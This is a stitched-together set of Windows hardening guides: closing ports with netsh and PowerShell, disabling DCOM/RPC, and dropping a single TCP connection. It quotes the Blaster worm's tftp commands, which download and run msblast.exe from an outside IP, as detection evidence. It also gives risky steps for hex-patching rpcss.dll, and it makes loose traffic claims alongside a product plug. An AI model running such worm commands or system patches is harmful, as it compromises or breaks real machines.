Why close ports in Windows?
Through open ports in the Windows operating system, you can become infected with a virus. In this article we will explain how and why to close ports in Windows.
Close the doors! The familiar call to shut the door behind you when you enter a room applies just as well to configuring the computer's firewall. A huge number of Windows computers are infected with dangerous viruses because users approach firewall configuration irresponsibly, mostly because they assume that the antivirus they installed protects them from every virus.
Unfortunately, installing an antivirus will not protect your computer from every possible threat. Most of the viruses that infect Windows enter through the operating system's open ports, and these ports are enabled by default.
Let us define the concept of a "port". Imagine a queue of incoming connections to the computer from various programs, some of them infected. Each entry in the queue is assigned a number so that it is clear where in the operating system it should connect. The operating system listens on the port and, when it sees a connection to it, accepts it. The rest is routine: the virus enters the computer and starts infecting everything it can. It may also open additional ports so that more connections reach the computer from outside and the infection spreads faster. To stay safe you need to close the "doors", that is, tell the system not to listen on certain ports and to reject all connections to them.
The most vulnerable ports in Windows operating systems
Examination of the largest computer infections showed that almost 90% of malicious traffic was sent through ports 135, 137, 139 and 445. These ports are used for:
- TCP port 445 — file sharing (SMB)
- TCP port 139 — remote connections to the computer (NetBIOS session service)
- UDP port 137 — looking up information on other computers (NetBIOS name service)
- TCP port 135 — remote procedure calls (RPC endpoint mapper)
There are several ways to close ports in Windows. Let’s look at them.
Inexperienced users think that closing ports in Windows is very difficult and that something can be broken. In fact there is nothing difficult about it, and closed ports protect you from the threat of your computer being hacked and important data being lost.
The easiest way, which requires no additional software, is the Windows command line. The command line is used when a setting has no graphical interface and you must tell the system to apply it manually.
Before running the commands you must open a command prompt (run it as administrator, since firewall rules require it). Press Win + R to open the Run dialog, type cmd and press OK or Enter; a black command window opens. What remains is small: copy each command below in turn, paste it into the command line and execute it. The last number in each command is the port that the command blocks.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block_TCP-135"
netsh advfirewall firewall add rule dir=in action=block protocol=udp localport=137 name="Block_UDP-137"
netsh advfirewall firewall add rule dir=in action=block protocol=udp localport=138 name="Block_UDP-138"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"
These commands close the ports discussed above, as well as port 5000, no less dangerous because it is used to discover open services, and UDP port 138, which NetBIOS uses.
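As an added example (not from the article), the same rules written in PowerShell with the NetSecurity cmdlets available from Windows 8 / Server 2012 onwards. It applies the protocol each service actually uses (137 and 138 are UDP), skips rules that already exist, then reads the rules back and lists what is still listening. The rule names are mine; the script needs an elevated prompt.

```powershell
# Added example, not the article's own commands. Requires an elevated PowerShell
# session and the NetSecurity module (Windows 8 / Server 2012 and later).

# Ports from the article, with the protocol each service really uses.
$rules = @(
    @{ Name = 'Block_TCP-135';  Protocol = 'TCP'; Port = 135  }   # RPC endpoint mapper
    @{ Name = 'Block_UDP-137';  Protocol = 'UDP'; Port = 137  }   # NetBIOS name service
    @{ Name = 'Block_UDP-138';  Protocol = 'UDP'; Port = 138  }   # NetBIOS datagram service
    @{ Name = 'Block_TCP-139';  Protocol = 'TCP'; Port = 139  }   # NetBIOS session service
    @{ Name = 'Block_TCP-445';  Protocol = 'TCP'; Port = 445  }   # SMB
    @{ Name = 'Block_TCP-5000'; Protocol = 'TCP'; Port = 5000 }   # listed by the article
)

foreach ($r in $rules) {
    # Idempotent: do not create a duplicate rule with the same display name.
    if (Get-NetFirewallRule -DisplayName $r.Name -ErrorAction SilentlyContinue) {
        Write-Host "Rule $($r.Name) already exists, skipping"
        continue
    }
    New-NetFirewallRule -DisplayName $r.Name -Direction Inbound -Action Block `
        -Protocol $r.Protocol -LocalPort $r.Port -Profile Any | Out-Null
    Write-Host "Created $($r.Name)"
}

# Verification 1: read the rules back together with their port filters.
Get-NetFirewallRule -DisplayName 'Block_*' | ForEach-Object {
    $pf = $_ | Get-NetFirewallPortFilter
    [pscustomobject]@{
        Rule     = $_.DisplayName
        Enabled  = $_.Enabled
        Action   = $_.Action
        Protocol = $pf.Protocol
        Port     = $pf.LocalPort
    }
} | Format-Table -AutoSize

# Verification 2: a block rule drops inbound packets but does not stop the service,
# so the services usually remain in the Listen state. Show who owns those listeners.
Get-NetTCPConnection -State Listen |
    Where-Object { $_.LocalPort -in 135, 139, 445, 5000 } |
    Select-Object LocalAddress, LocalPort, OwningProcess |
    Format-Table -AutoSize
```

Blocking 139 and 445 inbound stops other machines from reaching file and printer shares on this computer, so the rules suit a workstation that only consumes shares. Remove a rule again with `Remove-NetFirewallRule -DisplayName 'Block_TCP-445'`.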
You can also close ports in Windows using third-party software. The principle is simple: such programs scan the system for open ports and offer to close the most vulnerable ones without you entering any commands. The most popular and easiest-to-use program for closing ports in Windows is Windows Doors Cleaner. Using it is simple: after installation, run the program and close the ports that it offers.
Conclusion
Closed ports do not give a 100% guarantee that your computer is completely protected from viruses. The best defence is common sense: install operating system updates, do not click on suspicious links on the Internet and do not install programs from unofficial sources. For greater confidence that you are fully protected, buy a VPN, which protects your traffic from being intercepted by hackers.
Close all ports windows
Hey man,
the thing is, the most desirable ports for hackers are the ones you can't close, so take a look at this:
MS RPC, port 135, DCOM buffer overrun and the Blaster worm
Microsoft’s RPC implementation runs over TCP port 135.
RPC is used by a number of higher level protocols for their transport layer, such as by DCOM.
Vulnerabilities have been found in Microsoft’s RPC implementation and the services it gives access to.
Closing TCP port 135
It is highly desirable to close port 135 and to allow KFSensor to listen to it. Port 135 is consistently one of the most attacked ports on the Internet.
It is not possible to simply disable the RPC service as there are many essential parts of Windows that require RPC to be running even though they do not make network connections.
However, Microsoft does not allow RPC to be configured to a different port, and by default it is bound to all network interfaces, making it vulnerable to attack from the Internet.
The following sections describe how to disable services that run on top of RPC, which is desirable in itself, and then to close port 135 itself.
Disable RPC dependent services
Several non-essential services use RPC and these should be disabled.
Shutdown and disable the following services in the services console.
SSDP Discovery Service
Windows Time
Messenger
Remote Registry
System Event Notification
Remote Desktop Help Session Manager
Distributed Transaction Coordinator
Task Scheduler service
COM+ Event System
COM+ System Application
Disable DCOM
Windows DCOM allows applications to share COM functionality over a TCP/IP network. Only a few applications have ever used DCOM and it is due to be phased out by Microsoft. This functionality is turned on by default and uses RPC.
Run «Dcomcnfg.exe» from the Start menu «Run.» item.
Select the following: Component Services -> Computers -> My Computer
Right Click and select the Properties menu item
Select the Default Properties tab
Uncheck «Enable Distributed COM on this computer» option.
Select the Default Protocols tab
Remove «Connection-oriented TCP/IP» from the list of DCOM protocols.
It is also possible to do the same directly by editing the registry.
Run «regedt32.exe» from the Start menu «Run.» item.
Select the key «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole»
Set the value «EnableDCOM» to «N».
Select the key «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc»
Edit the value «DCOM Protocols». This may contain a number of strings.
Delete the string «ncacn_ip_tcp»
Configure RPC
It is possible to reconfigure MS RPC to make it safer using a Microsoft configuration tool rpccfg.
To obtain this tool go to www.microsoft.com and enter rpccfg into their site search and download it from the link.
The idea is to get RPC to only bind to the loopback address.
From the DOS command prompt type: rpccfg -l
This will list the available interfaces. Make a note of the number next to the subnet 127.0.0.0, which will probably be 1.
Now type: rpccfg -a 1 (or the number you noted before).
Now type: rpccfg -q and only the loopback address should be listed.
To complete the configuration the following setting needs to be added to the Registry:
Run «regedt32.exe» from the Start menu «Run.» item.
Select the key «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs»
Add the string value «ListenOnInternet» and set it to «N».
After performing the above re-boot the machine.
If all the RPC using services have been closed down then port 135 should now be closed and KFSensor will be able to use it.
If port 135 is still bound by RPC then at least one RPC using service is still running.
Either close down the remaining RPC using services, or if they cannot be shut down then there is the option of patching the RPC server.
Patching the RPC server
Microsoft RPC cannot be configured to listen on a port other than 135.
Instead it is necessary to patch the system to force it not to use the port.
Patching an OS is strictly for advanced users.
The server needs to be patched using a hex editor.
If you do not have a hex editor, use 010 Editor which you can get from this address:
http://www.sweetscape.com/010editor/
The RPC server is implemented in a file called rpcss.dll, however this file is in constant use.
So you will first have to disable it, re-boot, patch it, re-enable it and reboot again.
Make a copy of the file rpcss.dll, as a backup.
Copy the file from \windows\system32\rpcss.dll into one of your own directories, using Windows Explorer.
From the Start menu select Run.
Enter «regedt32» and click on OK.
Expand the tree and select the key:
HKLM\System\CurrentControlSet\Services\RpcSs
Rename the value «ImagePath» to «xImagePath»
Exit regedt32 and re-boot the machine. The machine may take longer than normal to start up and some functionality will no longer be available. The Start bar may no longer be visible, so it is a good idea to have a shortcut to a DOS box on the desktop. This will be re-enabled later.
Run your hex editor and open the file \windows\system32\rpcss.dll
Search for the byte sequence «31 00 33 00 35» or the Unicode text «135».
Over-write this byte sequence to «30 00 30 00 30».
This changes the port from 135 to 000, which DCOM will not be able to open.
Save the file in the hex editor.
From the Start menu select Run.
Enter «regedt32» and click on OK.
Expand the tree and select the key:
HKLM\System\CurrentControlSet\Services\RpcSs
Rename the value «xImagePath» to «ImagePath»
Exit regedt32 and re-boot the machine.
The DCOM server should no longer bind to port 135 and KFSensor should be listening to this port.
Blaster background
On the 16 July 2003 Microsoft released a patch to fix a buffer overrun in its Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface.
http://support.microsoft.com/default.aspx?scid=kb;en-us;823980
On the 11 August 2003 a new worm (‘Blaster’) was detected which exploited this vulnerability and rapidly infected large numbers of unpatched machines.
http://www.microsoft.com/security/incident/blast.asp
The Blaster worm attacks a Windows machine by first executing a buffer overrun at port 135 TCP. This causes a vulnerable machine to listen to port 4444 TCP and execute the following command «tftp -i 81.128.17.117 GET msblast.exe». This downloads the worm from the attacking machine. msblast.exe is then executed and the process continues.
Blaster events
If attacked by the Blaster worm you will see the following two events in quick succession.
1. Port 135
Received 1776 bytes containing the binary buffer overrun.
2. Port 4444
Containing the following text:
tftp -i 81.128.81.118 GET msblast.exe
start msblast.exe
msblast.exe
The only thing you can't do is rename the ImagePath, but the other implementations I haven't tried yet. Can you tell me if it's safe to proceed with the hex thing?
Blocking ports is not always the only effective measure.
Will be looking forward to replies.
Thanks in advance
RR
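As an added example (not part of the reply above or of the KFSensor manual it quotes), here is a read-only PowerShell audit that reads back the registry values the instructions tell you to change (EnableDCOM, DCOM Protocols, ListenOnInternet and the RpcSs ImagePath) and reports which process, if any, still listens on TCP 135. The registry paths are the ones given in the post; the function name is mine and nothing is modified.

```powershell
# Added example: audit the DCOM/RPC settings named in the forum post. Read-only.
# Registry paths come from the post; the function and output layout are mine.

function Get-DcomRpcPosture {
    $ole = 'HKLM:\SOFTWARE\Microsoft\Ole'
    $rpc = 'HKLM:\SOFTWARE\Microsoft\Rpc'
    $svc = 'HKLM:\SYSTEM\CurrentControlSet\Services\RpcSs'

    # Each value may be absent; -ErrorAction SilentlyContinue yields $null in that case.
    $enableDcom = (Get-ItemProperty -Path $ole -Name 'EnableDCOM'       -ErrorAction SilentlyContinue).EnableDCOM
    $protocols  = (Get-ItemProperty -Path $rpc -Name 'DCOM Protocols'   -ErrorAction SilentlyContinue).'DCOM Protocols'
    $listenInet = (Get-ItemProperty -Path $svc -Name 'ListenOnInternet' -ErrorAction SilentlyContinue).ListenOnInternet
    $imagePath  = (Get-ItemProperty -Path $svc -Name 'ImagePath'        -ErrorAction SilentlyContinue).ImagePath

    # Is anything still bound to TCP 135, and which process owns it?
    $listeners = Get-NetTCPConnection -State Listen -LocalPort 135 -ErrorAction SilentlyContinue
    $owners = foreach ($l in $listeners) {
        $p = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
        "$($l.LocalAddress):$($l.LocalPort) pid=$($l.OwningProcess) ($($p.ProcessName))"
    }

    [pscustomobject]@{
        EnableDCOM       = $(if ($null -eq $enableDcom) { '(absent)' } else { $enableDcom })
        DcomTcpEnabled   = ($protocols -contains 'ncacn_ip_tcp')   # REG_MULTI_SZ, may be $null
        ListenOnInternet = $(if ($null -eq $listenInet) { '(absent)' } else { $listenInet })
        RpcSsImagePath   = $imagePath
        Port135Listeners = $(if ($owners) { $owners -join '; ' } else { '(none)' })
    }
}

Get-DcomRpcPosture | Format-List
```

Run it before and after making changes so you have a record of the starting state. On current Windows versions the RPC endpoint mapper on 135 is required by core services, so an inbound firewall block (as in the article above) is the change that can be reverted cleanly; this audit will still show the listener in that case, which is expected.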
How to close TCP and UDP ports via windows command line
Does somebody know how to close a TCP or UDP socket for a single connection via the Windows command line?
Googling about this, I saw some people asking the same thing. But the answers looked like a manual page of netstat or netsh commands focusing on how to monitor the ports. I don’t want answers on how to monitor them (I already do this). I want to close/kill them.
EDIT, for clarification: Let’s say that my server listens TCP port 80. A client makes a connection and port 56789 is allocated for it. Then, I discover that this connection is undesired (e.g. this user is doing bad things, we asked them to stop but the connection didn’t get dropped somewhere along the way). Normally, I would add a firewall to do the job, but this would take some time, and I was in an emergency situation. Killing the process that owns the connection is really a bad idea here because this would take down the server (all users would lose functionality when we just want to selectively and temporally drop this one connection).
Yes, this is possible. You don’t have to be the current process owning the socket to close it. Consider for a moment that the remote machine, the network card, the network cable, and your OS can all cause the socket to close.
Consider also that Fiddler and Desktop VPN software can insert themselves into the network stack and show you all your traffic or reroute all your traffic.
So all you really need is either for Windows to provide an API that allows this directly, or for someone to have written a program that operates somewhat like a VPN or Fiddler and gives you a way to close sockets that pass through it.
There is at least one program (CurrPorts) that does exactly this and I used it today for the purpose of closing specific sockets on a process that was started before CurrPorts was started. To do this you must run it as administrator, of course.
Note that it is probably not easily possible to cause a program to not listen on a port (well, it is possible, but that capability is referred to as a firewall), but I don't think that was being asked here. I believe the question is «how do I selectively close one active connection (socket) to the port my program is listening on?». The wording of the question is a bit off because a port number for the undesired inbound client connection is given and it was referred to as «port», but it's pretty clear that it was a reference to that one socket and not the listening port.
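As an added example (not from the question or any of its answers), the scripted equivalent of what the answer describes CurrPorts doing: closing one established IPv4 TCP connection by its 4-tuple through the Win32 `SetTcpEntry` API in iphlpapi.dll, which drops that connection while the listening socket and every other client stay untouched. The function names and the remote address 203.0.113.45 are mine (the address is a constructed placeholder from a documentation range); the script must run elevated and handles IPv4 only.

```powershell
# Added example: drop a single established TCP connection without touching the
# listener or its process. Uses SetTcpEntry (iphlpapi.dll) with state DELETE_TCB,
# the same call tools such as CurrPorts make. Elevated session required; IPv4 only.

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class TcpNative {
    [StructLayout(LayoutKind.Sequential)]
    public struct MIB_TCPROW {
        public uint dwState;
        public uint dwLocalAddr;    // IPv4 address, network byte order
        public uint dwLocalPort;    // port, network byte order in the low 16 bits
        public uint dwRemoteAddr;
        public uint dwRemotePort;
    }
    public const uint MIB_TCP_STATE_DELETE_TCB = 12;
    [DllImport("iphlpapi.dll", SetLastError = true)]
    public static extern uint SetTcpEntry(ref MIB_TCPROW pTcpRow);
}
'@

function ConvertTo-NetworkOrderAddress {
    # Dotted IPv4 string -> DWORD holding the bytes in network order, as MIB_TCPROW expects.
    param([string]$Address)
    $bytes = [System.Net.IPAddress]::Parse($Address).GetAddressBytes()
    if ($bytes.Length -ne 4) { throw "Only IPv4 addresses are supported: $Address" }
    return [BitConverter]::ToUInt32($bytes, 0)
}

function ConvertTo-NetworkOrderPort {
    # 16-bit port -> byte-swapped (network order) value in the low-order 16 bits.
    param([int]$Port)
    return [uint32]((($Port -band 0xFF) -shl 8) -bor (($Port -shr 8) -band 0xFF))
}

function Close-TcpConnection {
    param(
        [Parameter(Mandatory)][string]$LocalAddress,
        [Parameter(Mandatory)][int]$LocalPort,
        [Parameter(Mandatory)][string]$RemoteAddress,
        [Parameter(Mandatory)][int]$RemotePort
    )
    $row = New-Object 'TcpNative+MIB_TCPROW'
    $row.dwState      = [TcpNative]::MIB_TCP_STATE_DELETE_TCB
    $row.dwLocalAddr  = ConvertTo-NetworkOrderAddress $LocalAddress
    $row.dwLocalPort  = ConvertTo-NetworkOrderPort $LocalPort
    $row.dwRemoteAddr = ConvertTo-NetworkOrderAddress $RemoteAddress
    $row.dwRemotePort = ConvertTo-NetworkOrderPort $RemotePort
    $rc = [TcpNative]::SetTcpEntry([ref]$row)
    if ($rc -ne 0) { throw "SetTcpEntry failed with Win32 error $rc (317 usually means the session is not elevated)" }
}

# Usage for the asker's scenario: among the established connections to the listener on
# port 80, pick the client at the (constructed) remote address and drop only that one.
$bad = Get-NetTCPConnection -LocalPort 80 -State Established |
       Where-Object { $_.RemoteAddress -eq '203.0.113.45' }
foreach ($c in $bad) {
    Close-TcpConnection -LocalAddress $c.LocalAddress -LocalPort $c.LocalPort `
                        -RemoteAddress $c.RemoteAddress -RemotePort $c.RemotePort
    Write-Host "Closed $($c.RemoteAddress):$($c.RemotePort) -> :$($c.LocalPort) (owning pid $($c.OwningProcess))"
}
```

The server process sees the drop as an ordinary peer disconnect on that one socket, which is exactly the selective, temporary removal the question asks for; the client can reconnect, so pair this with a firewall rule for the remote address if the behaviour continues.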